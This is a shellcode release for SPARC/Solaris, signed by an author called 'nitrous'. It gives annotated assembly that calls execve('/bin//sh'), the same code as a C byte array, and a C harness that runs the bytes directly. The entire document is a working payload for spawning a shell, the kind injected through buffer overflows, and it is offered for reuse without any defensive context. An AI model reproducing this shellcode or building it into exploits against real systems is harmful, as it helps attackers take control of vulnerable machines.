/*******************************************************************
(nitrous@fight:~/shellc0ding$)uname -a
SunOS fight 5.9 Generic_112233-10 sun4u sparc SUNW,Ultra-2 Solaris
(nitrous@fight:~/shellc0ding$)cat execve-nitrous.s
! execve("/bin//sh") SPARC/Solaris Shellc0de
!
!   --=[ n i t r o u s ]=--
! nitrous[at]danitrous[dot]org
!
! 08 / 04 / 2005 - Mexico

.globl  _start
_start:
        set     0x2f62696e, %l0         ! %l0 = '/bin'
        set     0x2f2f7368, %l1         ! %l1 = '//sh'
        std     %l0, [ %sp - 16 ]       ! store 64 bits [ %l0 and %l1 ] in the stack
        clr     [ %sp - 8 ]             ! put 0x00000000 after that '/bin//sh'
        sub     %sp, 0x10, %o0          ! %sp-0x10 = '/bin//sh' address [first argument]
        st      %o0, [ %sp - 24 ]       ! store 32 bits [ %o0 ] at %sp-24 [@'/bin//sh']
        clr     [ %sp - 20 ]            ! put 0x00000000 after that @'/bin//sh'
        sub     %sp, 0x18, %o1          ! %sp-0x18 = @'/bin//sh' [second argument]
        xor     %o2, %o2, %o2           ! clear %o2 [NULL] [third argument]
        mov     0x3b, %g1               ! 0x3b = SYS_execve()
        ta      0x8                     ! execve("/bin//sh",{"/bin//sh",NULL},NULL)

        mov     0x1, %g1                ! 0x1 = SYS_exit() [if execve() fails]
        ta      0x8                     ! exit()

! THE STACK ...
! |@'/bin//sh'| NULL | "/bin//sh" |  NULL  |       |%sp
! |    -24    | -20  |    -16     |   -8   |   -4  |
!<- 4 bytes - 4 bytes - 8 bytes - 4 bytes - 4 bytes|

**********************************************************************/

char sparc_execve[]=
"\x21\x0b\xd8\x9a\xa0\x14\x21\x6e"
"\x23\x0b\xcb\xdc\xa2\x14\x63\x68"
"\xe0\x3b\xbf\xf0\xc0\x23\xbf\xf8"
"\x90\x23\xa0\x10\xd0\x23\xbf\xe8"
"\xc0\x23\xbf\xec\x92\x23\xa0\x18"
"\x94\x1a\x80\x0a\x82\x10\x20\x3b"
"\x91\xd0\x20\x08\x82\x10\x20\x01"
"\x91\xd0\x20\x08";

main()
{
	void(*f00)()=(void *) sparc_execve;
	printf("Shellcode size: %d bytes\n",strlen(sparc_execve));
	f00();
}